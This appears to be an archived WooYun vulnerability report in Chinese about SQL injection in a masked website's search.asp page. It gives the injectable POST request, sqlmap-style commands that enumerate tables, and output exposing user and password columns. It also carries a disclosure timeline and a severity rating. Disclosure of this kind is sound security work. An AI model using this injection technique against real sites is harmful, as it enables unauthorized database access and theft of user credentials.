乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-27: 细节已通知厂商并且等待厂商处理中 2015-12-31: 厂商已经确认,细节仅向厂商公开 2016-01-10: 细节向核心白帽子及相关领域专家公开 2016-01-20: 细节向普通白帽子公开 2016-01-30: 细节向实习白帽子公开 2016-02-12: 细节向公众公开
RT
POST /search.asp HTTP/1.1Host: **.**.**.**User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://**.**.**.**/search.aspCookie: ASPSESSIONIDCQCBARSQ=BBHLBPPDIBMEJIKBNCBFAPOEConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 93stype=%E4%BD%93%E6%A3%80%E6%9C%BA%E6%9E%84&keywords=%25&%E6%8F%90%E4%BA%A4=%E6%90%9C%E7%B4%A2-r f:\i.txtweb server operating system: Windows 2008web application technology: ASP.NET, Microsoft IIS 7.5back-end DBMS: MySQL 5.0.11-r f:\i.txt --common-tablesCurrent database[12 tables]+----------------+| Apply || Province || Service || admin || city || links || news || package || report || sysconstraints || sysusers || users |+----------------+-r f:\i.txt --columns -T "users"Database: AllTable: users[11 columns]+----------+-------------+| Column | Type |+----------+-------------+| city | non-numeric || email | non-numeric || id | non-numeric || mobile | non-numeric || password | non-numeric || qq | non-numeric || question | non-numeric || title | non-numeric || uname | non-numeric || user | non-numeric || username | non-numeric |+----------+-------------+-r f:\i.txt --columns -T "report"Database: AllTable: report[8 columns]+----------+-------------+| Column | Type |+----------+-------------+| city | non-numeric || id | non-numeric || mima | non-numeric || password | non-numeric || title | non-numeric || uname | non-numeric || user | non-numeric || username | non-numeric |+----------+-------------+
修复
危害等级:中
漏洞Rank:8
确认时间:2015-12-31 14:58
CNVD未直接复现所述情况,暂未建立与网站管理单位的直接处置渠道,待认领。
暂无